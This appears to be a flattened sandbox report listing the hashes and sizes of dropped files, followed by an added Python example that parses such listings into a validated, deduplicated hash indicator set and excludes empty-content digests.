MITRE ATT&CK Enterprise v6
Downloads
Filesize  144B
MD5       c0c4dd01481ff3a703ac73b49ca4721b
SHA1      9301b418edb3f3ac684782cbe56a10742a5583c7
SHA256    edb31bcd25f403b040bef989f9c581e631acdd220a7e0ef35fef6366ea640197
SHA512    ed386e793f95b702aaae0e8f8d8f9bc9c0afd7e903890f52b13ad7465be5aa69f868b10986ab7199a1cc0e29ae27b6dab8363b5fc91f97768855f18988a342fd

Filesize  2KB
MD5       769f90a306fabe2f5c57fcea076eae51
SHA1      39a11f12a7aed70a70e61d5cedee18e0ccc8efb0
SHA256    357b20973d563146e0d0593126245dd3a3b7c4f22ee996dd159312eb7f3f05bf
SHA512    827b25e200aa0f90956d319281ffc85c827d15e2be2cff2ba50389cc4b0801c4dbfdfa69c46404b9614159659492f5e5be15254f18f167cd8a9c8643b3f0e62f

Filesize  369B
MD5       be6ba7b54f526cd35708c29d39037bfa
SHA1      de0fe633af587a5de7daa1a497d51c1a28681b46
SHA256    18993c4f567f5740e6a55cf3b9412fe832a96c226ebdf79e4599e74ee60d8286
SHA512    ce24c5e3e7ebbb7e59b13240c257cadec1261da9b2d674339f00012e5b8bfceca7a756a50261268e4ba65e3557a4f45d8d67f7f44e8ee6bae09357ce299f3e35

Filesize  535B
MD5       7d9c18b69253c42cdda1667d126a08ce
SHA1      24700ca645c14c6a5ee65a11171b76fab738bd38
SHA256    4270ea5444ae7b4c3c131bd7e809fe2129d61d263f0a5bacd559752a55451c74
SHA512    c68af6ac0de1f201cf590a87021d8759830a0d5a573a570eb0cbb1f87c0bbf49e17332bde793855f8c9e7a6b7a10c2c6f3fb6c15a915cfc1a039aa5dcf2deb1a

Filesize  6KB
MD5       618a1e1e0b4fc1e16b9888a7900a8c45
SHA1      ffae4d7b193a600576cf748426896fc145f7ec2f
SHA256    6f1700725180f6cae8b64509172497802ca3a1e09738eddbf1e63065cfb800fb
SHA512    588325ee67307c9fa79479dfd8600254b732e032aaf1bc1a217b5b13ac39769d2d65191002e72a7ab792b192e9ffdbf36e1f2cf530294b250282b5ee0906030a

Filesize  6KB
MD5       beceafdab81d91f325acb6a6829de184
SHA1      47c4a88642fbaa24aa45b5f00a52b3892d0c8e43
SHA256    a0e2322f2e1153c74a5d8e0bf50c0a7bf2ef10403301a38f52ebac85091106a3
SHA512    e717b7da629904fbe343ca6a1486c85ebc2e4cefe8fd029b5f3d677a347468b5fff6bb7502e8d218467167212871e151c0ab0d74539d679e77b0e52b1c21f2b1

Filesize  6KB
MD5       c5763a403428ed888b6b573b975c8f1d
SHA1      c4961f5c579c82aa737de997773e1ff57152e4ef
SHA256    fde24be38b3f88a925170181d99ca6dbc4a298f2850bff6e5bbdfa695ee14c96
SHA512    dfba37aaa2f286347e77de097955ac1cdb6ed15af62bcae764fa5cffdc5f875cf446a1861e8fc4f428ee9b8ab376272087e7031f25a2c539f7707193a6f82026

Filesize  15KB
MD5       7c9dd6555db937d77f0e633ae9b46463
SHA1      1f5ae1767cda05cab6faf94bb2165dc47d65713b
SHA256    5da4a58b00d1c7a4cb173edd6cc70d778f6ce2498a5815edc245fee73da25baa
SHA512    6d8d741d5d8edb52a80597835a988f385f0289bcf6086943cc5425ad029dce4d0a1272bcd0be4e493a28c87a8e4d42f976e3322b0162e02cbc82348d3ce7a510

Filesize  172KB
MD5       16227a97015b30861559f88d7ba28c25
SHA1      37698ac5c4fd0beb9b3813f1c3edba37ba9efe69
SHA256    f87f57e6e9a1543d944003c0866bf9c8d1ed39296dca71567d3de09859cdccbc
SHA512    065be8b87e56d81ca61471699eee9594373283574711123637727677c0181dc0382e7ccc04164cd39f32c76cdf1b6193b1721b6ea7f8de6dcb5f3c2392532b09

Filesize  172KB
MD5       2b460e97e82c14de893d1e747163cf99
SHA1      aff0836d9d93c36db8fb4270a8a3612678309546
SHA256    7b75a8c58e437c0802a9337101c2eef26ede8254592f56c91e3916ce99849e48
SHA512    998acd363027a74d6ad7212edb2cbf20c8732c1166f9ebfb29269971e1c5142d6bfd52fc67d0e276036151d2929d8bec9066b29b8d00bd12ff4a0faff1b2cd3d

Filesize  99KB
MD5       49ee65934486669f111de6c9b860a1fe
SHA1      b66d6eefb316caa254b92f4585bd586a19ca2b52
SHA256    b2bbe8dddfa768da575c08f64d3587daea37705ff2ec985d568b4625a22aafeb
SHA512    09710a4dde93e1fe77e75322b24e60035b35ad920b902314bb2ae4c621b842bcd7b209a459598fbf5f03eed9cac6bec68d010bb337e886bf9a637c55431a565c

Filesize  97KB
MD5       2f463a668478565bcdea6086f84ef8bd
SHA1      9432d259e1e4c55ab41834bc4b96cd46aa9c718c
SHA256    bd3767d0c836e48287ff8903d9d8a4e56d49d358d4c6119bc5b9dc86017fa4b6
SHA512    962a175e2058ef41e9cda3dc5ceb69b0947e83092ddfda987d9f963f435bee832af07d2e49b8e79688e8ff18aaf9f24327b071be80b40ea20062db519f66413a

Filesize  2B
MD5       99914b932bd37a50b983c5e7c90ae93b
SHA1      bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f
SHA256    44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a
SHA512    27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Filesize  152B
MD5       610003c56a177b0384d6fb52bddd79da
SHA1      dee64128972597ba8c0ae9f4ac502c1065c670d9
SHA256    750ed9c6bf8f2155b43e1e9684ab39c383ef2bdf375ae7820a488b59f0495877
SHA512    c8394769c6ed907ba07a087ee29c62e61f1aa490cc11a431831010221cd789a8f8a8be33c8894e76dc1bbeea7c512b2ce6db76427c470c1a74c9d5bfd3ef6298

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize  288B
MD5       f2638b7b2ec661c92f7ab7743e017e06
SHA1      f6b96d02fccb82ddebdbdf3b00f8b4d8e20d1102
SHA256    cb1db54f30826b2642ae37b4de5d535547808bf6f0dd7606712353d0c83ba716
SHA512    42c1233f240b5e688eadfda7f5365aec8e4e04f6a7382d524a7cbf23ff7c31386c611e36e2803c347599fadde17a48bedb6eecf6fafe31d2c9d2fcc1562ccb4b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe571637.TMP
Filesize  48B
MD5       617dba6e961ed26333adf21fa2ceb252
SHA1      5256a2cddf80753dbc37e4c99ad60e072d2a4645
SHA256    886f6c75fd1087e3c4e42ed7f51773648d305da2cf5ddb01f11c2fdc56a50bc9
SHA512    cf106b685f826a6043d7880e2375c9c9c933e8715517102ef102eae6ffdea87d119860f013e7fde52a2612d4226d037da4c9567eec7a6eda41da4a526446528b

Filesize  70KB
MD5       e5e3377341056643b0494b6842c0b544
SHA1      d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256    e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA512    83f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef

Filesize  2KB
MD5       c995979c24f29590a21c4cde049c7582
SHA1      8137174e4c1de91b2237d81fbda8a84ed35e4e54
SHA256    33bfe8b65be5c9639e1c8683341be0432803f79d460ef220b9862a601bd588b1
SHA512    ef4a1fe76447400294098bfe8a2ad4fc62d64ca06d78700a11b241f6d34e8620d554fd12eff8bd8b8345ec3c5d3cb0d8d1e28b425802bb504a9d20835b2f1a6f

Filesize  1KB
MD5       9cf5da8207d8bae1d2c3ddcd0c3e4526
SHA1      156bef6dacd7c133e8f05ed0f9770bd8208c453f
SHA256    d2cb63cb68b46b91044bb767cbcee7dc5b85bc448734a805c1921c17218313a3
SHA512    ff7e4a566cd3a27ae7b84f9dc015d3489a64aa2da3758b21e0709e09750ce4176c27090329ef8381b49c9c36f3b9fc05af065c4d78399e45614d9443c4fdbd08

Filesize  4KB
MD5       22321eca7c5600f8a3b836c4a182dfd3
SHA1      05f8bebb939e956af4dc728c568382a1eef472c7
SHA256    9f0aaea9b3572c39195e5d6dc8191b96a6e07961f594b81a5be89baef6c601f0
SHA512    44add6fbeb7682a62d5b624b49a0ecb17d664440751ff55c0226430cde9be9ec46d6e90f629d772f31d6753ba9adf1cc5bdc09fad9189822b28bcef7bacf98fa

Filesize  6KB
MD5       8a66228ae74bb2a0f36aeb619a362c04
SHA1      d2e96b5ef9efeabf2c74e79023fe237b35fd03db
SHA256    b37101485cf026081e7b7b961141a3103f6bc1c7a0987aee274da08b5f7c10ca
SHA512    5cc363ae35e4b5ed133cb26e46b581b70319ff3da30e389305b3fe3ea24f3bc56435fd432785c04ea9ea10bfd42acc15ee5f1d091f800ccf5f2bf093be1c4c7a

Filesize  6KB
MD5       b0a9ae6afa6d6f0063cfb58edab1d4ad
SHA1      31ca11414cda9271c4e31bbe3aa84c20927bcd64
SHA256    d8c7e01ab786c0329ac27b5b931718c0e24d833e9e43bba73f1e58a1224c710c
SHA512    6e70398cb968c83c2e2b93e66fe0d6b401636dfc356464b7a24203b395f8b38976a5a6f466c8480d9f526f95cbe777876495d02b95663767cd916b81e0e9082e

Filesize  7KB
MD5       9f3dce4f1f039fedd03aef314c59aa0d
SHA1      ccd092280572dfe646f8d38f1a6741b3d97965dd
SHA256    41f277cd6a3c1c49eb69ff59a90a34a1625e6b0d48365995c5daec147374c8a3
SHA512    e4bf6220fbfb4dc9057bb0244052153805d4825fab3d32122568e9ce07f84322f0128a084af70d2c7dffef85c56f72f8579401f37039e1ff73d99085d4d167a8

Filesize  24KB
MD5       b19b048548718e5ec507132a64ae96af
SHA1      95b7e9da11ae6d6abc367e8a37e3bcc203eeedbf
SHA256    b48eb5eb7e44576078ed25adfa3f819949a29cda229776860aca77c19107f892
SHA512    942d72f9f25550a31bcaf134f41c612f08392adc112d9d58e4187bca76f26d7e012cdd0bffadb1dce574254a6474ee604ca8dff2335d812566fc0fdb1155124d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize  96B
MD5       deeea7f821a7be6cd65818ce1545a20d
SHA1      033dcd5f9dba57ad7c454cf3c3521f7eeca96abb
SHA256    3f6bb73580daecd7df1547051278e06d2d31def620b07c2886a3e640fcdd266b
SHA512    e9cfc7407629f1e978e9252eb9b0b4f16b90ea719288258d54c6f79ac9a1cb0fd9e2c07e7a75e9905640aca64ddb37e410614e1b8bda1c21a200895cbf2231e1

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe56f9e5.TMP
Filesize  48B
MD5       9559f1e6317621e347229c04023070bc
SHA1      1605deda966b9e5220546ecaa2e455a2053aa843
SHA256    c56b6325ed1bebcd9293a003e7833e3d0207b02461b75931b03a4e159519c0a8
SHA512    016d9c0a0645012a702a89e3f465090f9c8d46814a1c2c86be6067b032a60d2f4737016b5da4612fff3b4afe0631a4f1ea165baa8ad1bfbc4ce0b7edf5097b7f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a49ffabb-a4db-4e29-b130-5047524e3691.tmp
Filesize  24KB
MD5       4fd054c69665ea437b1a20e418c64443
SHA1      e8d9eee4354ebfe06180117f718441784241577e
SHA256    3019dfc3ad41088ef51f0c69004e66fd2e97176ca542fa07cad3ed9b2c00eaa5
SHA512    8b2067e825a1cbb619519a1d07ecca6aed7751f7690042108a6cc48241a734f1e0d1f027baa07d6fe27ad58c5dd7da41a0daa749edd2a0c18921cece1b08e12c

Filesize  16B
MD5       206702161f94c5cd39fadd03f4014d98
SHA1      bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256    1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512    0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

Filesize  41B
MD5       5af87dfd673ba2115e2fcf5cfdb727ab
SHA1      d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256    f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512    de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Filesize  16B
MD5       46295cac801e5d4857d09837238a6394
SHA1      44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256    0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512    8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Filesize  264KB
MD5       9a94ed45bcc347ac9b4363f8e921cf99
SHA1      bf159eae302b46d234849ad9c4b0c045bcf46a57
SHA256    eddb6c27e85f4c02608db03492ae3ddb1cbfa3d8de9b0b20658dfcb8c1ec6819
SHA512    3248a1d20bccc21b83be8f90a99ffb1a8602f0142d6d3b2e4e0c0b78083e46d08d32d232fd33b93b24494674f9ad17576e3a2002bf9c2ae7280b76c95b0dc607

Filesize  10KB
MD5       5fb4ac54a9d3328e58dd24a74fbc07ca
SHA1      1d80a71574c4faeb1c5969b9f681d1b9efd1cf6d
SHA256    7254943da5c2e0c8e0cdcb93a8c3fd535cb49e7859b86ec1fcd96e32189e9791
SHA512    0b13c8b359d70f4030b52830f916c0bc251aeb26d90972f297d7744b04f1fddd0c01ad0e21e90df41d81ddcc266f4d537fcbf9b6f4224d49c8f05679e0e66e8d

Filesize  13KB
MD5       b8ce0d8c8f8e224121664d6334a7d907
SHA1      741bdcd8eb9a25577b5036de648ffad42a048bc4
SHA256    d0cc977c9caa0bb1bf21be600716d57c044a0aa4d52e8fb1412f85d4d19ddaf4
SHA512    0cd1c47014065576ee3f657ff4b2cbef17f09f4913e08f41f961c6c34387e101cc2cddf2adb9c863cbe0b1e1f805679806df891f7699be5d04a64e382e9ff44f

Filesize  13KB
MD5       42cb35e4299340e9ba2a450e37ac535d
SHA1      8187786d841963f18d7ca76a357b0cd098f32949
SHA256    ac2479c9b8197672b74d46318e724eefb0264f8385fda7e6a0d882d1e523d584
SHA512    e100c30fc8748ed99f6a5c54aa8c0daec2c1393dad5be62de54513b9104aa41b2eaeda7ea793d876ce488541e66c73a4e98e70b77303d138012766adc940ec63

Filesize  13KB
MD5       a7c5514165ed28ea99e1df7d5a30582f
SHA1      a03bd6f151ee9ff1b4000afec99b29a4deb6f82f
SHA256    1dbe9c21b729cf5b6fe40bc155f124034560b22511958d1ce7235dae7ae316f6
SHA512    85d17d609f90edae22fb2bcb6151e34945ea1993ad1a7c20741cd941df10359f74bbc72dd857ae71e762da6195721a4689e7369e0b87b74e4a9d232eba86f781

Filesize  46KB
MD5       02d2c46697e3714e49f46b680b9a6b83
SHA1      84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256    522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512    60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Filesize  2B
MD5       f3b25701fe362ec84616a93a45ce9998
SHA1      d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256    b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512    98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
Filesize  3KB
MD5       8ff5f96e998626d7715ab32544db5a84
SHA1      35be681854560adf4861e6e05ec0f1823967ef5f
SHA256    c3be30b57c0e8bbc99ad59542dc1da35a03957d3a2d5e0662d65f8bfd56024f0
SHA512    c5c7546754dcc8d6afb8a200e6e2d4e60b25bbfaff87402895276be2edb51b2cbcaaca645e090bd1580d366e3d3366e5629ae981fdc57644e9e2b5b88f455383

Filesize  41KB
MD5       37baae3e4ac0dd427f6f13eac9e8ea92
SHA1      48847b1fcc4ee40ae5b3793ccee7014ea7b921f1
SHA256    196bee36f98e27275a6ae634069fb1631c4c4551afa7f7eae4271b382f18ef43
SHA512    68ad378cf56ec4b63ef38159a525d33978c04373a8a6b837930e0d722baa59deca2f69e70dbc244c4ab3acc94e7ab3bbf978d8828f9300d841fcd272a8d2500b
Listed five times: five dropped files with identical content.

MD5       d41d8cd98f00b204e9800998ecf8427e
SHA1      da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256    e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512    cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
Listed twice; these are the digests of zero-length content, so they match every empty file and are of no use as indicators.
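Dropped-file listings like the one above are the raw material for a hash blocklist, but as extracted they fuse labels with values ("MD5c0c4...", "Filesize288B"), repeat identical files, and include digests of empty content that would match every zero-byte file on an endpoint. The following is an added example, not part of the report and not any sandbox vendor's tooling: a parser for this listing shape that accepts fused, split and spaced label/value lines, validates digest lengths, counts repeated content, and excludes the empty-content digests. The sample input is constructed from a few of the entries above plus one deliberately malformed entry (the "deadbeef" MD5) to exercise validation.

```python
"""Parse a flattened sandbox "Downloads" (dropped-file) listing into IOC records.

Added example, not part of the sandbox report. SAMPLE_LISTING is constructed
from a few of the report's entries, in the raw fused shape, the split shape
and a spaced shape, plus one deliberately malformed entry.
"""
import hashlib
import re
from typing import Dict, List, Optional

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# Longer labels first so "SHA1" cannot swallow the start of "SHA512"/"SHA256".
LABEL_RE = re.compile(r"^(Filesize|SHA512|SHA256|SHA1|MD5)\s*(\S*)$")
WIN_PATH_RE = re.compile(r"^[A-Za-z]:\\")

# Digests of zero-length input, computed locally rather than copied from the page.
EMPTY_DIGESTS = {name: getattr(hashlib, name.lower())(b"").hexdigest() for name in DIGEST_LEN}

SAMPLE_LISTING = r"""
-
Filesize
144B
MD5c0c4dd01481ff3a703ac73b49ca4721b
SHA19301b418edb3f3ac684782cbe56a10742a5583c7
SHA256edb31bcd25f403b040bef989f9c581e631acdd220a7e0ef35fef6366ea640197
SHA512ed386e793f95b702aaae0e8f8d8f9bc9c0afd7e903890f52b13ad7465be5aa69f868b10986ab7199a1cc0e29ae27b6dab8363b5fc91f97768855f18988a342fd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize288B
MD5f2638b7b2ec661c92f7ab7743e017e06
SHA1f6b96d02fccb82ddebdbdf3b00f8b4d8e20d1102
SHA256cb1db54f30826b2642ae37b4de5d535547808bf6f0dd7606712353d0c83ba716
SHA51242c1233f240b5e688eadfda7f5365aec8e4e04f6a7382d524a7cbf23ff7c31386c611e36e2803c347599fadde17a48bedb6eecf6fafe31d2c9d2fcc1562ccb4b
-
Filesize
41KB
MD537baae3e4ac0dd427f6f13eac9e8ea92
SHA148847b1fcc4ee40ae5b3793ccee7014ea7b921f1
SHA256196bee36f98e27275a6ae634069fb1631c4c4551afa7f7eae4271b382f18ef43
SHA51268ad378cf56ec4b63ef38159a525d33978c04373a8a6b837930e0d722baa59deca2f69e70dbc244c4ab3acc94e7ab3bbf978d8828f9300d841fcd272a8d2500b
-
Filesize  41KB
MD5       37baae3e4ac0dd427f6f13eac9e8ea92
SHA1      48847b1fcc4ee40ae5b3793ccee7014ea7b921f1
SHA256    196bee36f98e27275a6ae634069fb1631c4c4551afa7f7eae4271b382f18ef43
SHA512    68ad378cf56ec4b63ef38159a525d33978c04373a8a6b837930e0d722baa59deca2f69e70dbc244c4ab3acc94e7ab3bbf978d8828f9300d841fcd272a8d2500b
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
2B
MD5deadbeef
"""


def parse_listing(text: str) -> List[Dict[str, str]]:
    """One dict per entry. Entries are separated by '-' or blank lines, a Windows
    path line names the entry, and a label with no value takes the next line."""
    entries: List[Dict[str, str]] = []
    cur: Dict[str, str] = {}
    pending: Optional[str] = None

    def flush() -> None:
        nonlocal cur, pending
        if cur:
            entries.append(cur)
        cur, pending = {}, None

    for raw in text.splitlines():
        line = raw.strip()
        if line in ("", "-"):
            flush()
            continue
        if pending is not None:                 # value line for a split label
            cur[pending] = line if pending == "Filesize" else line.lower()
            pending = None
            continue
        if WIN_PATH_RE.match(line):
            flush()
            cur["path"] = line
            continue
        m = LABEL_RE.match(line)
        if not m:
            continue                            # section headers, notes, etc.
        label, value = m.groups()
        if value:
            cur[label] = value if label == "Filesize" else value.lower()
        else:
            pending = label
    flush()
    return entries


def validate(entry: Dict[str, str]) -> List[str]:
    """Problems found; empty when every digest present is hex of the right length."""
    problems = []
    for name, n in DIGEST_LEN.items():
        v = entry.get(name)
        if v is not None and not re.fullmatch(rf"[0-9a-f]{{{n}}}", v):
            problems.append(f"{name} malformed ({len(v)} chars)")
    return problems


def build_ioc_set(entries: List[Dict[str, str]], algo: str = "SHA256") -> Dict[str, int]:
    """Unique digest -> number of listed files carrying it. Skips entries that are
    malformed, lack the chosen digest, or carry the digest of empty content."""
    counts: Dict[str, int] = {}
    for e in entries:
        v = e.get(algo)
        if not v or validate(e) or v == EMPTY_DIGESTS[algo]:
            continue
        counts[v] = counts.get(v, 0) + 1
    return counts


def summarize(text: str, algo: str = "SHA256") -> Dict[str, int]:
    entries = parse_listing(text)
    return {
        "entries": len(entries),
        "malformed": sum(1 for e in entries if validate(e)),
        "empty_content": sum(1 for e in entries if e.get(algo) == EMPTY_DIGESTS[algo]),
        "unique_iocs": len(build_ioc_set(entries, algo)),
    }


if __name__ == "__main__":
    for digest, n in sorted(build_ioc_set(parse_listing(SAMPLE_LISTING)).items()):
        print(f"{digest}  x{n}")
    print(summarize(SAMPLE_LISTING))
```

The count per digest is worth keeping rather than collapsing to a set: a content hash that recurs across several dropped files is a stronger pivot for hunting than a one-off, and the Filesize field stays a string because the listing rounds sizes to whole KB and cannot be used for exact matching.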